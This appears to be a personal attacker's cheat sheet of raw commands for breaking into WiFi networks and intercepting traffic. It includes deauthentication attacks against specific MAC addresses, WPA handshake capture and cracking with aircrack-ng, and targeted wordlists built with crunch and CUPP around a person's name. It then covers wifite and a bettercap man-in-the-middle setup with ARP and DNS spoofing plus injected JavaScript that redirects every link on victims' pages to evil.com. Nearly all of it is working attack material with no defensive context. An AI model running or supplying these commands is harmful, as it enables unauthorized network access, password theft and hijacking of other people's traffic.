iwconfig
airmon-ng start wlan0
airodump-ng wlan0
airodump-ng -c6 -w Capture-Pat -d 28:EE:52:99:20:02 wlan0
aireplay-ng --deauth 0 -a 28:EE:52:99:20:02 -c 14:11:14:4E:B1:64 wlan0
aircrack-ng Capture-Pat-01.cap -w /usr/share/wordlists/rockyou.txt

Brute Force Wordlist: crunch 8 12 -t Imtiaz$$$$$$ -o passwords.txt
Custom Wordlist: https://github.com/Mebus/cupp.git
python3 cupp.py -i
crunch 8 12 -t Imtiaz%%%^^^ -o password.lst
aircrack-ng Capture-Pat-01.cap -w password.lst
------------------------------------------------------------------------
airodump-ng -c1 -w Capture-Pat -d 54:48:E6:A4:59:1B wlan0
aireplay-ng --deauth 0 -a 54:48:E6:A4:59:1B -c CE:72:66:E1:6A:56 wlan0


bettercap -iface wlan0
help
wifi.recon on
wifi.show
set wifi.recon.channel 3
set net.sniff.verbose true
set net.sniff.filter ether proto 0x888e
set net.sniff.output wpa.pcap
net.sniff on
wifi.show
wifi.deauth <BSSID_TARGET>
exit
Crack: aircrack-ng -w password.lst -b <TARGET_BSSID> 02-C0-CA-91-6C-71_partial.pcap

Tool: airgeddon.sh

$ sudo wifite
$ sudo wifite --wpa --dict wifipass.txt --kill

Intercept and modify network traffic EASY MITM Attack (Bettercap tutorial)

sudo bettercap
net.probe on
net.show
set arp.spoof.targets <TARGET_IP>
arp.spoof on
net.sniff on
net.sniff off
set dns.spoof.domains evil.com
service apache2 start
ifconfig
dns.spoof on

java-script.js:
---------------
window.onload = function() {
	console.log("Hacked Website");
	anchors = document.getElementByTagName("a");
	for (var i = 0; i < anchors.length; i++) {
		anchors[i].href = 'https://evil.com/' ;
	}
	//document.write("<h1> You have been hacked </h1>");
}

set http.proxy.injectjs ./java-script.js
http.proxy on
http.proxy off










